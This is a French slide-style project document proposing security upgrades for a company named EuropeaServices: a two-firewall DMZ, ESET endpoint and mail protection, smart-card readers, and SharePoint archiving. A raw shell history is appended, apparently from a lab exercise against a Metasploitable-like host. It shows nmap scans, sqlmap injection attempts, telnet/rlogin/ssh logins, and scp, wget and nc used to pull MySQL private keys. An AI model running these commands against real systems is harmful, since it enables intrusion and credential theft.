---
title: Lot Sécurité
description: View the slide with "Slide Mode".
---
---
> # Lot 11 : Conception et mise en place d’une solution Sécurité
---
Toutes les sociétés, quelle que soit leur taille activité, sont confrontées à des problématiques de sécurité informatique en entreprise. De nombreuses menaces pèsent sur l'infrastructure ainsi que sur les données et nous devons nous mettre rapidement en oeuvre tous les dispositifs nécessaires pour assurer la protection. La plupart des entreprises subissent en moyenne 4 cyber-attaques par an, et bien que le risque zéro n’existe pas, de nombreuses solutions permettent de les éviter.
---
# Sécurité chez EuropeaServices
Premièrement nous allons voir le niveau de sécurité chez EuropeaServices ensuite les solutions proposées par COUNTER IT. Europeaservices est constitué actuellement de deux sites se trouvant sur Paris 11 et à la Défense avec 500 salariés. Il souhaite évoluer en créant deux autres sites à Lyon et à Nantes pour s’agrandir avec 200 salariés en plus.
Vers la fin de l'année 2019, EuropeaService souhaite s'engager dans le réaménagement complet de ses sites à la Défense et à Paris 11 en flex Office (Open Space). Ce changement vers l'open space nécessite quelques modifications dans l'utilisation du matériel. C'est un grand défi pour nous d'assurer la communication, la sécurité et la rapidité dans le travail quotidien des collaborateurs.
Voici quelques solutions que nous proposons pour améliorer leur sécurité :
## 1. Mise en place d'une DMZ entre deux firewalls.
Dès que l'on souhaite utiliser une connexion Internet pour des applications plus avancées se fait ressentir le besoin de disposer de plus d'un niveau de sécurité. La connexion du réseau de l'entreprise vers Internet peut impliquer également la mise en place d'un certain nombre de services réseaux visibles depuis Internet : serveur HTTP, serveur de messagerie par exemple. Dans ce cas, les besoins associés à ces serveurs se situent dans un niveau de sécurité élévé : ils ne bénéficient pas du même niveau de protection que les machines du réseau interne (totalement masquées, mais inatteignables), mais généralement on souhaite ne pas les exposer directement sur Internet et assurer leur protection.
Les sites d'EuropeaServices sont sécurisés avec des firewalls de type DELL SonicWALLTZ TZ 500 Network Security Appliance de 1.400 Mbps. Nous aimerons proposer 2 models fortigate pour remplacer et renforcer la sécurité de l'entreprise.



On peut aussi envisager d'utiliser deux équipements : un firewall interne et un firewall externe. Le firewall interne est configuré pour protéger le réseau local tout en lui permettant d'accéder à Internet et aux serveurs publics de l'entreprise. Le firewall externe autorise les connexions entrantes à destination des serveurs publics. Cette solution est connu sous le nom de DMZ sandwich.
Nous avons constaté qu'EuropeaServices avait mis en place une DMZ pour sécuriser le réseau interne. Mais nous proposons d'améliorer avec une infrastructure qui est composé d'une DMZ entre deux firewalls comme indiqué sur le schéma ci-dessous.

## 2. Solution Anti-Virus et Anti-Spam
La messagerie est le principal point d’entrée des menaces informatiques. Les virus, malwares et logiciels espions se diffusent principalement par l’intermédiaire des pièces jointes et emails. D’autre part, des cybercriminels peuvent tenter des attaques pour tromper les collaborateurs et obtenir des données capitales comme des mots de passe par exemple. Nous devrons impérativement sécuriser le mieux possible la messagerie d’entreprise en installant des système anti-virus et anti-spams efficaces.
Pour cela, nous proposons la solution E-SET, le pack de sécurité informatique avancée pour les entreprises. E-SET nous propose plusieurs solutions de sécurité informatique :
### ESET Dynamic Endpoint Protection
1.1. Security Management Center : est une console Web qui offre une visibilité en temps réel de tous les endpoints sur site et hors site. C'est une console intuitive et facile qui possède :
- une visibilité complète du réseau
- Gestion complète de la sécurité
- Reporting flexible et détaillé
- Gestion centralisée
1.2. Solutions de protection Endpoint : La nouvelle génération de produits ESET pour la protection endpoint combine la prévention contre les malwares, ransomwares et l'exploitation de failles. La technologie multicouche d'ESET est combinée au machine learning, à l'analyse comportementale, au big data.
- Endpoint Security : Solution antimalware complète intégrant un pare-feu, le filtrage web et la protection contre les botnets pour Windows et MAC.
- Protection des serveurs : Protection antimalware multiplateforme contre les infections par fichier partagé ou par hôte.
- ESET Virtualization Security pour VMware : Une solution de sécurité rapide et sans agent pour sécuriser les VMs.
### ESET Dynamic Mail Protection
La meilleure solution multi-plateforme pour la protection des emails. La solution est administrable depuis la console de gestion centralisée. Elle permet :
- Protection contre le phishing
- Filtrage des spams
- Protection contre les ransomwares
- Détection des attaques zero-day
- Gestion centralisée
## 3. Solution sécurité avec une carte à puce
### Le chaos des mots de passe trop nombreux
Des risques accrus, la complexité toujours plus grande de l’utilisation du matériel informatique et l’accès à distance aux réseaux d’entreprise rendent les procédures d’identification de plus en plus compliquées. Les clients de messagerie, bases de données, applications spécifiques type ERP ou CRM, les "salles virtuelles" sécurisées, l’intranet : tout cela augmente le nombre de mots de passe, codes PIN ou ID d’accès.
La sécurisation des mots de passe est donc une question très problématique. L’association "nom d’utilisateur"/"mot de passe" n’est souvent pas suffisante pour s’assurer que des données critiques gardent une protection fiable contre des accès non autorisés. De plus, stressés ou incapables de tout retenir, les utilisateurs d'EuropeaServices font souvent la grave erreur de noter leurs mots de passe sur des supports non protégés tels que leur téléphone portable ou leur répertoire.
### La solution de cartes à puce
Pour parer aux risques liés aux mots de passe, les cartes à puces sont maintenant une solution technique reconnue dans le monde entier. Comparés aux cartes à piste magnétique, ces "mini ordinateurs" peuvent être utilisés dans une plus large gamme de situations et être lus jusqu’à 100 000 fois, soit une durée de vie bien plus longue. Ils ne sont pas affectés par les champs magnétiques et grâce à une protection intégrée contre les surtensions ils sont également à l’abri des décharges électriques.
Donc nous proposons la solution de cartes à puces qui contient un code PIN à 4 chiffres simplifiant les accés vers les applications et les sites du groupe EuropeaServices. Nous avons aussi décidé de mettre en place des lecteurs de cartes à puces à l'entrée des salles serveurs et aussi sur les imprimantes pour mieux sécuriser. Car une sécurisation par carte à puce demande de plus gros efforts pour accéder à un environnement non autorisé. De plus, cela reste une solution très abordable financièrement et rapidement rentabilisée.
Pour cela, nous vous proposons le logiciel
et les lecteurs de carte à puce :
#### Lecteur de cartes monofente LITEO Ingenico
##### Specification :
Le lecteur monofente "Plug and Play" (ne nécessite pas de pilotes ou drivers) ! Le LITEO se branche directement au port USB de l'ordinateur et fonctionne sur les environnements suivants : Windows, LINUX (via driver open source), MACOS X (10.4 minimum).
Les principaux atouts du lecteur LITEO de Ingenico :
- Un rapport qualité / prix inégalé.
- Léger : 59 grammes - Dimensions : 8,4 x 6,8 x 1 cm.
- Répond aux normes PC/SC et CCID.
- Respecte l'environnement : fabriqué sans aucune vis et entièrement recyclable.
- Emploi des technologies avancées : USB 2.0, taux de transfert supérieur à 420 Kbps.
- Prix : 19,90 €
#### Lecteur de cartes à puce OMNIKEY HID 3121
#### Specification
- Interface : USB 2.0
- Vitesse de transmission : 12 Mbps
- Types de cartes supportés : Cartes à puce 1.8V, 3V et 5V - ISO 7816 Classe A, AB et C
- Dimensions : 74 x 64 x 13mm
- Poids : 48 gr. Aprox.
- Câble connecteur : 150 cm
- Prix : 
## 4. Dématérialisation des documents sur SharePoint
Les gestionnaires de la RH d'EuropeaServices reçoivent encore des documents par courriers. Ces documents sont donc imprimés, classés et stockés dans les locaux de l'entreprises. Nous avons aussi remarqué que les gestionnaires perdent énormement de temps pour stocker et aussi pour chercher des documents. Nous propons donc de remplacer ce systeme d'archivage par des sites Sharepoint Online.
#### SharePoint Online
SharePoint est une plateforme de collaboration basée sur site Web qui utilise des applications de workflow, des bases de données « listes » et d’autres composants WebParts, ainsi que des fonctions de sécurité pour permettre aux équipes professionnelles de collaborer. SharePoint permet aussi à l’entreprise qui utilise la plateforme de contrôler l’accès à l’information et d’automatiser les processus de workflow dans l’ensemble des unités commerciales.SharePoint permet d’augmenter la productivité et la visibilité des professionnels de l’information dans tous les secteurs et dans des entreprises de toutes tailles. Les fonctionnalités de SharePoint sont axées sur une expérience de collaboration transversale basée sur l’intranet permettant le partage sécurisé, la gestion du contenu et la collaboration sur des workflows, ainsi que de nombreuses autres fonctions.
SharePoint donne aussi la possibilité à ses utilisateurs de télécharger des documents et les partager immédiatement avec d’autres personnes ayant besoin de les voir. Il est également facile d’envoyer des liens vers les documents partagés ou les espaces de collaboration par e-mail, ce qui permet aux utilisateurs d’accéder facilement et sans détour aux données qu’ils souhaitent consulter.
Annexe
- Dynamic EndPoint Protection

- Cloud Administrator


TO-DO
Devis antivirus E-SET
Devis logiciel lecteur de carte a puce
1 cp VMwareTools-10.3.10-13959562.tar.gz /tmp/
2 cd /tmp/
3 ls
4 tar -xvf VMwareTools-10.3.10-13959562.tar.gz
5 ls
6 cd vmware-tools-distrib/
7 ls
8 ./vmware-install.pl
9 ifconfig
10 ping 192.168.80.129
11 netstat -b
12 netstat -r
13 netstat -s
14 netstat
15 nmap
16 nmap -b 192.168.80.129
17 nmap -Pn 192.168.80.129
18 ./urlopen 192.168.80.129
19 xdg-open http://192.168.20.129
20 xdg-open http://192.168.80.129
21 xdg-open http://192.168.80.129/phpinfo
22 sqlmap -u 192.168.80.129/phpinfo
23 sqlmap -u 192.168.80.129/phpinfo -dbs
24 sqlmap 192.168.80.129/phpinfo -dbs
25 sqlmap 192.168.80.129/phpinfo --dbs
26 apt install --only-upgrade sqlmap
27 sqlmap -u 192.168.80.129/phpinfo --dbs
28 apt install --only-upgrade sqlmap
29 sqlmap -u 192.168.80.129/phpinfo --dbs
30 sqlmap -u 192.168.80.129 --dbs
31 sqlmap -u 192.168.80.129/index.php?id=1 --dbs
32 sqlmap -u http://192.168.80.129/index.php?id=1
33 sqlmap -u http://192.168.80.129/index.php?id=1 --dbs
34 sqlmap -u http://192.168.80.129/index.php? --dbs
35 sqlmap -u http://192.168.80.129/index.php?id=11 --dbs
36 sqlmap -u http://192.168.80.129/phpinfo --dbs
37 sqlmap -u http://192.168.80.129/phpinfo --dbs --tamper
38 sqlmap -u http://192.168.80.129/phpinfo --tamper
39 arp-scan -1
40 arp-scan -l
41 sqlmap -u http://192.168.80.129/phpinfo --dbs
42 clear
43 arp-scan -1
44 arp-scan -l
45 clear
46 arp-scan -l
47 xdg-open http://192.168.80.129
48 sqlmap -u http://192.168.80.129/phpMyAdmin/?id=1 --dbs
49 sqlmap -u http://192.168.80.129/phpMyAdmin/ --dbs
50 apt-get install sqlmap
51 apt-get update
52 apt-get install sqlmap
53 arp-scan -l
54 xdg-open http://192.168.80.129/phpmyadmin
55 xdg-open http://192.168.80.129/phpMyAdmin/id=1
56 sqlmap -u http://192.168.80.129/phpMyAdmin/?id=100 --dbs
57 sqlmap -u http://192.168.80.129/phpMyAdmin/?id=* --dbs
58 nmap -sV 192.168.80.129 | grep ftp
59 nmap -sV 192.168.80.129
60 nmap -sV 192.168.80.129 | grep ftp
61 nmap -sV -A 192.168.80.129 | grep ftp
62 ftp 192.168.80.129
63 nmap -sV -A 192.168.80.129 | grep ftp
64 ftp 192.168.80.129
65 nmap -sV 192.168.80.129
66 nmap -sV -A 192.168.80.129 | grep telnet
67 telnet 192.168.80.129
68 telnet 192.168.80.129
69 ssh msfadmin@192.168.80.129
70 scp msfadmin@192.168.80.129:/vulnerable
71 scp msfadmin@192.168.80.129:/vulnerable /tmp/test/
72 scp msfadmin@192.168.80.129:vulnerable/mysql-ssl/mysql-keys/server-key.pem /tmp/test/
73 scp msfadmin@192.168.80.129:vulnerable/mysql-ssl/mysql-keys/server-key.pem /tmp/test/test.pem
74 touch /tmp/test/test.pem
75 mkdir /tmp/test/
76 touch /tmp/test/test.pem
77 scp msfadmin@192.168.80.129:vulnerable/mysql-ssl/mysql-keys/server-key.pem /tmp/test/test.pem
78 cat /tmp/test/test.pem
79 nano /tmp/test/test.pem
80 cd /tmp/test/
81 ls
82 rm test.pem
83 scp msfadmin@192.168.80.129:vulnerable/mysql-ssl/mysql-keys/server-key.pem /tmp/test/test.pem
84 ls
85 nano test.pem
86 rm test.pem
87 ls
88 scp msfadmin@192.168.80.129:vulnerable/mysql-ssl/mysql-keys/server-key.pem /tmp/test/
89 ls
90 nano server-key.pem
91 scp msfadmin@192.168.80.129:vulnerable/mysql-ssl/mysql-keys/client-cert.pem /tmp/test/
92 vim client-cert.pem
93 rlogin 192.168.80.129
94 rlogin -l msfadmin@192.168.80.129
95 rlogin -l msfadmin 192.168.80.129
96 man ettercap
97 ettercap
98 ettercap 192.168.80.129
99 ettercap
100 exit
101 nc -l -p 23 > test.pem
102 nc -l -p 23 > server-key.pem
103 nc -l -p 23 > test
104 ls
105 nano server-key.pem
106 rm server-key.pem
107 rm test
108 rm test.pem
109 ls
110 clear
111 l;s
112 ls
113 clear
114 cd ..
115 ls
116 wget -q http://192.168.80.128/vulnerable/mysql-ssl/mysql-keys/server-keys
117 ls
118 wget -q http://192.168.80.128/vulnerable/mysql-ssl/mysql-keys/server-keys /tmp/
119 ls
120 cd tmp/
121 ls
122 wget -q http://192.168.80.128/vulnerable/mysql-ssl/mysql-keys/server-keys.pem /tmp/
123 ls
124 xdg-open http://192.168.80.128/vulnerable/mysql-ssl/mysql-keys/server-keys
125 wget -q http://192.168.80.129/vulnerable/mysql-ssl/mysql-keys/server-keys.pem /tmp/
126 ls
127 wget -q http://192.168.80.129/vulnerable/mysql-ssl/mysql-keys/server-keys.pem /tmp/test.pem
128 ls
129 cd ..
130 wget -q http://192.168.80.129/vulnerable/mysql-ssl/mysql-keys/server-keys.pem /tmp/test.pem
131 ls
132 cd tmp/
133 ls
134 wget -q http://192.168.80.129/vulnerable/mysql-ssl/mysql-keys/server-keys.pem /tmp/test.pem
135 wget -q http://192.168.80.129/phpinfo /tmp/test.pem
136 ls
137 cat phpinfo
138 telnet 192.168.80.129
139 ls
140 cd /tmp/
141 ls
142 cd
143 ls
144 cd ..
145 ls
146 cd tmp/
147 ls
148 cd ..
149 cd
150 ls
151 cd ..
152 ls
153 ssh msfadmin@192.168.80.129
154 ssh -l admin-f2i 192.168.80.129
155 ssh -l user 192.168.80.129
156 rlogin msfadmin 192.168.80.129
157 rlogin 192.168.80.129
158 rlogin -l msfadmin 192.168.80.129
159 exit
160 history